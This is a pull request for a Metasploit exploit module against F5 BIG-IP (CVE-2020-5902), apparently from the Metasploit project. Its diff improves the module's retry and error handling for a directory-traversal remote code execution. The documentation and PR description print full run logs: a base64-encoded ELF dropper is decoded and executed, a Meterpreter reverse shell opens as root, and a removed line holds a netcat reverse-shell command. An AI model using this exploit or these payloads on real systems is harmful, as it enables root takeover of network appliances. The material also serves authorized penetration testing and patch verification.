### PR TITLE
Improve robustness of exploit/linux/http/f5_bigip_tmui_rce (CVE-2020-5902)

### DIFF
--- a/documentation/modules/exploit/linux/http/f5_bigip_tmui_rce.md
+++ b/documentation/modules/exploit/linux/http/f5_bigip_tmui_rce.md
@@ -7,7 +7,7 @@ Management User Interface (TMUI) to upload a shell script and execute
 it as the Unix root user.
 
 Unix shell access is obtained by escaping the restricted Traffic
-Management Shell (TMSH). The escape isn't very reliable, so you may
+Management Shell (TMSH). The escape may not be reliable, and you may
 have to run the exploit multiple times. Sorry!
 
 Versions 11.6.1-11.6.5, 12.1.0-12.1.5, 13.1.0-13.1.3, 14.1.0-14.1.2,

--- a/documentation/modules/exploit/linux/http/f5_bigip_tmui_rce.md
+++ b/documentation/modules/exploit/linux/http/f5_bigip_tmui_rce.md
@@ -53,7 +53,7 @@ Defaults to `/tmp`.
 
 ```
 msf5 > use exploit/linux/http/f5_bigip_tmui_rce
-[*] Using configured payload cmd/unix/reverse_netcat_gaping
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
 msf5 exploit(linux/http/f5_bigip_tmui_rce) > options
 
 Module options (exploit/linux/http/f5_bigip_tmui_rce):
@@ -72,7 +72,7 @@ Module options (exploit/linux/http/f5_bigip_tmui_rce):
    VHOST                       no        HTTP server virtual host
 
 
-Payload options (cmd/unix/reverse_netcat_gaping):
+Payload options (linux/x64/meterpreter/reverse_tcp):
 
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
@@ -84,33 +84,45 @@ Exploit target:
 
    Id  Name
    --  ----
-   0   Unix Command
+   1   Linux Dropper
 
 
-msf5 exploit(linux/http/f5_bigip_tmui_rce) > set rhosts 172.16.163.145
-rhosts => 172.16.163.145
-msf5 exploit(linux/http/f5_bigip_tmui_rce) > set lhost 172.16.163.1
-lhost => 172.16.163.1
+msf5 exploit(linux/http/f5_bigip_tmui_rce) > set rhosts 172.16.249.179
+rhosts => 172.16.249.179
+msf5 exploit(linux/http/f5_bigip_tmui_rce) > set lhost 172.16.249.1
+lhost => 172.16.249.1
 msf5 exploit(linux/http/f5_bigip_tmui_rce) > run
 
-[+] nc 172.16.163.1 4444 -e /bin/sh
-[*] Started reverse TCP handler on 172.16.163.1:4444
+[*] Started reverse TCP handler on 172.16.249.1:4444
 [*] Executing automatic check (disable AutoCheck to override)
 [+] The target is vulnerable. Target is running BIG-IP 14.1.2.
 [*] Creating alias list=bash
+[-] Alias "list" already exists, deleting it
+[*] Deleting alias list=bash
+[+] Successfully deleted alias list=bash
+[*] Creating alias list=bash
 [+] Successfully created alias list=bash
-[*] Executing Unix Command for cmd/unix/reverse_netcat_gaping
-[*] Executing command: nc 172.16.163.1 4444 -e /bin/sh
-[*] Uploading /tmp/VaU9ShHKR9vSa4U2q87Tio
-[+] Successfully uploaded /tmp/VaU9ShHKR9vSa4U2q87Tio
-[*] Executing /tmp/VaU9ShHKR9vSa4U2q87Tio
-[*] Command shell session 1 opened (172.16.163.1:4444 -> 172.16.163.145:39434) at 2020-07-07 12:11:02 -0500
-[+] Deleted /tmp/VaU9ShHKR9vSa4U2q87Tio
+[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
+[*] Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAASDH/aglYmbYQSInWTTHJaiJBWrIHDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXKwQ+QFRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==>>'/tmp/wCkkU.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/whuIi' < '/tmp/wCkkU.b64' ; chmod +x '/tmp/whuIi' ; '/tmp/whuIi' ; rm -f '/tmp/whuIi' ; rm -f '/tmp/wCkkU.b64'"]
+[*] Executing command: echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAASDH/aglYmbYQSInWTTHJaiJBWrIHDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXKwQ+QFRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==>>'/tmp/wCkkU.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/whuIi' < '/tmp/wCkkU.b64' ; chmod +x '/tmp/whuIi' ; '/tmp/whuIi' ; rm -f '/tmp/whuIi' ; rm -f '/tmp/wCkkU.b64'
+[*] Uploading /tmp/WuyGIfbP
+[+] Successfully uploaded /tmp/WuyGIfbP
+[*] Executing /tmp/WuyGIfbP
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3012516 bytes) to 172.16.249.179
+[*] Meterpreter session 1 opened (172.16.249.1:4444 -> 172.16.249.179:55118) at 2020-07-17 06:06:38 -0500
+[+] Deleted /tmp/WuyGIfbP
+[*] Command Stager progress - 100.00% done (823/823 bytes)
 [*] Deleting alias list=bash
 [+] Successfully deleted alias list=bash
 
-id
-uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
-uname -a
-Linux localhost.localdomain 3.10.0-514.26.2.el7.ve.x86_64 #1 SMP Wed Aug 7 08:16:38 PDT 2019 x86_64 x86_64 x86_64 GNU/Linux
+meterpreter > getuid
+Server username: no-user @ localhost.localdomain (uid=0, gid=0, euid=0, egid=0)
+meterpreter > sysinfo
+Computer     : localhost.localdomain
+OS           : CentOS 7.3.1611 (Linux 3.10.0-514.26.2.el7.ve.x86_64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
 ```

--- a/documentation/modules/exploit/linux/http/f5_bigip_tmui_rce.md
+++ b/documentation/modules/exploit/linux/http/f5_bigip_tmui_rce.md
@@ -4,19 +4,27 @@
 
 This module exploits a directory traversal in F5's BIG-IP Traffic
 Management User Interface (TMUI) to upload a shell script and execute
-it as the root user.
+it as the Unix root user.
+
+Unix shell access is obtained by escaping the restricted Traffic
+Management Shell (TMSH). The escape isn't very reliable, so you may
+have to run the exploit multiple times. Sorry!
 
 Versions 11.6.1-11.6.5, 12.1.0-12.1.5, 13.1.0-13.1.3, 14.1.0-14.1.2,
 15.0.0, and 15.1.0 are known to be vulnerable. Fixes were introduced
 in 11.6.5.2, 12.1.5.2, 13.1.3.4, 14.1.2.6, and 15.1.0.4.
 
-Tested on the VMware OVA release of 14.1.2.
+Tested against the VMware OVA release of 14.1.2.
 
 ### Setup
 
 Download
 [BIGIP-14.1.2-0.0.37.ALL-scsi.ova](https://downloads.f5.com/esd/serveDownload.jsp?path=/big-ip/big-ip_v14.x/14.1.2/english/virtual-edition/&sw=BIG-IP&pro=big-ip_v14.x&ver=14.1.2&container=Virtual-Edition&file=BIGIP-14.1.2-0.0.37.ALL-scsi.ova)
 and import it into your desired virtualization software.
+
+You _may_ need to log in to the management interface as the `admin` user
+to complete system initialization and make the target exploitable. The
+default password for the `admin` user is `admin`.
 
 ## Verification Steps
 

--- a/modules/exploits/linux/http/f5_bigip_tmui_rce.rb
+++ b/modules/exploits/linux/http/f5_bigip_tmui_rce.rb
@@ -23,7 +23,7 @@ class MetasploitModule < Msf::Exploit::Remote
           it as the Unix root user.
 
           Unix shell access is obtained by escaping the restricted Traffic
-          Management Shell (TMSH). The escape isn't very reliable, so you may
+          Management Shell (TMSH). The escape may not be reliable, and you may
           have to run the exploit multiple times. Sorry!
 
           Versions 11.6.1-11.6.5, 12.1.0-12.1.5, 13.1.0-13.1.3, 14.1.0-14.1.2,

--- a/modules/exploits/linux/http/f5_bigip_tmui_rce.rb
+++ b/modules/exploits/linux/http/f5_bigip_tmui_rce.rb
@@ -5,7 +5,7 @@
 
 class MetasploitModule < Msf::Exploit::Remote
 
-  Rank = ExcellentRanking
+  Rank = AverageRanking
 
   prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::Remote::HttpClient
@@ -20,13 +20,17 @@ class MetasploitModule < Msf::Exploit::Remote
         'Description' => %q{
           This module exploits a directory traversal in F5's BIG-IP Traffic
           Management User Interface (TMUI) to upload a shell script and execute
-          it as the root user.
+          it as the Unix root user.
+
+          Unix shell access is obtained by escaping the restricted Traffic
+          Management Shell (TMSH). The escape isn't very reliable, so you may
+          have to run the exploit multiple times. Sorry!
 
           Versions 11.6.1-11.6.5, 12.1.0-12.1.5, 13.1.0-13.1.3, 14.1.0-14.1.2,
           15.0.0, and 15.1.0 are known to be vulnerable. Fixes were introduced
           in 11.6.5.2, 12.1.5.2, 13.1.3.4, 14.1.2.6, and 15.1.0.4.
 
-          Tested on the VMware OVA release of 14.1.2.
+          Tested against the VMware OVA release of 14.1.2.
         },
         'Author' => [
           'Mikhail Klyuchnikov', # Discovery
@@ -121,7 +125,7 @@ class MetasploitModule < Msf::Exploit::Remote
     when :linux_dropper
       execute_cmdstager
     end
-
+  ensure
     delete_alias if @created_alias
   end
 
@@ -136,8 +140,23 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     )
 
-    unless res && res.code == 200 && res.get_json_document['error'].blank?
-      fail_with(Failure::UnexpectedReply, 'Failed to create alias list=bash')
+    if res.nil? || (error = parse_error(res))
+      case error
+      when /private "list" \(list\) already exists/
+        print_error('Alias "list" already exists, deleting it')
+        delete_alias
+
+        # Try to create the alias again
+        return create_alias
+      when /java\.lang\.NullPointerException/
+        print_error('Encountered java.lang.NullPointerException, retrying!')
+
+        # XXX: Try to create the alias until we're successful
+        return create_alias
+      end
+
+      fail_with(Failure::UnexpectedReply,
+                "Failed to create alias list=bash#{error}")
     end
 
     @created_alias = true
@@ -164,8 +183,9 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     )
 
-    unless res && res.code == 200
-      fail_with(Failure::UnexpectedReply, "Failed to upload #{script_path}")
+    if res.nil? || (error = parse_error(res))
+      fail_with(Failure::UnexpectedReply,
+                "Failed to upload #{script_path}#{error}")
     end
 
     register_file_for_cleanup(script_path)
@@ -176,13 +196,32 @@ class MetasploitModule < Msf::Exploit::Remote
   def execute_script
     print_status("Executing #{script_path}")
 
-    send_request_cgi({
+    res = send_request_cgi({
       'method' => 'POST',
       'uri' => dir_trav('/tmui/locallb/workspace/tmshCmd.jsp'),
       'vars_post' => {
         'command' => "list #{script_path}"
       }
     }, 3.5)
+
+    # No response may mean the service is blocking on payload execution
+    return unless res && (error = parse_error(res))
+
+    case error
+    when /unexpected argument/
+      print_error('Alias "list" does not exist, attempting to create it again')
+      create_alias
+
+      # Try to execute the script again... smdh
+      return execute_script
+    when /java\.lang\.NullPointerException/
+      print_error('Encountered java.lang.NullPointerException, retrying!')
+
+      # XXX: Try to execute the script until we're successful
+      return execute_script
+    end
+
+    print_error("Failed to execute #{script_path}#{error}")
   end
 
   def delete_alias
@@ -196,12 +235,42 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     )
 
-    unless res && res.code == 200 && res.get_json_document['error'].blank?
-      print_warning('Failed to delete alias list=bash')
+    if res.nil? || (error = parse_error(res))
+      case error
+      when /user alias \(list admin\) was not found/
+        print_good('Alias "list" does not exist or was already deleted')
+        return
+      when /java\.lang\.NullPointerException/
+        print_error('Encountered java.lang.NullPointerException, retrying!')
+
+        # XXX: Try to delete the alias until we're successful
+        return delete_alias
+      end
+
+      print_warning("Failed to delete alias list=bash#{error}")
       return
     end
 
     print_good('Successfully deleted alias list=bash')
+  end
+
+  def parse_error(res)
+    return unless res
+
+    error =
+      case res.code
+      when 200
+        res.get_json_document['error']
+      when 500
+        # This is usually a java.lang.NullPointerException stack trace
+        res.get_html_document.at('//pre')&.text
+      else
+        res.body
+      end
+
+    return if error.blank?
+
+    ":\n#{error.strip}"
   end
 
   def dir_trav(path)

--- a/modules/exploits/linux/http/f5_bigip_tmui_rce.rb
+++ b/modules/exploits/linux/http/f5_bigip_tmui_rce.rb
@@ -67,7 +67,7 @@ class MetasploitModule < Msf::Exploit::Remote
             }
           ]
         ],
-        'DefaultTarget' => 0,
+        'DefaultTarget' => 1,
         'DefaultOptions' => {
           'SSL' => true,
           'WfsDelay' => 5


### PR DESCRIPTION
Here are some improvements that didn't make the deadline.

What's strange is that if the stars align, like if the system has been "used" enough, the exploit is incredibly reliable. Maybe my test environment is bonkers. In any case, I'm dropping the rank for the worst case.

```
msf5 exploit(linux/http/f5_bigip_tmui_rce) > run

[*] Started reverse TCP handler on 172.16.249.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable. Target is running BIG-IP 14.1.2.
[*] Creating alias list=bash
[-] Alias "list" already exists, deleting it
[*] Deleting alias list=bash
[+] Successfully deleted alias list=bash
[*] Creating alias list=bash
[+] Successfully created alias list=bash
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAASDH/aglYmbYQSInWTTHJaiJBWrIHDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXKwQ+QFRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==>>'/tmp/wCkkU.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/whuIi' < '/tmp/wCkkU.b64' ; chmod +x '/tmp/whuIi' ; '/tmp/whuIi' ; rm -f '/tmp/whuIi' ; rm -f '/tmp/wCkkU.b64'"]
[*] Executing command: echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAASDH/aglYmbYQSInWTTHJaiJBWrIHDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXKwQ+QFRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==>>'/tmp/wCkkU.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/whuIi' < '/tmp/wCkkU.b64' ; chmod +x '/tmp/whuIi' ; '/tmp/whuIi' ; rm -f '/tmp/whuIi' ; rm -f '/tmp/wCkkU.b64'
[*] Uploading /tmp/WuyGIfbP
[+] Successfully uploaded /tmp/WuyGIfbP
[*] Executing /tmp/WuyGIfbP
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3012516 bytes) to 172.16.249.179
[*] Meterpreter session 1 opened (172.16.249.1:4444 -> 172.16.249.179:55118) at 2020-07-17 06:06:38 -0500
[+] Deleted /tmp/WuyGIfbP
[*] Command Stager progress - 100.00% done (823/823 bytes)
[*] Deleting alias list=bash
[+] Successfully deleted alias list=bash

meterpreter > getuid
Server username: no-user @ localhost.localdomain (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 7.3.1611 (Linux 3.10.0-514.26.2.el7.ve.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
```

Updates #13807.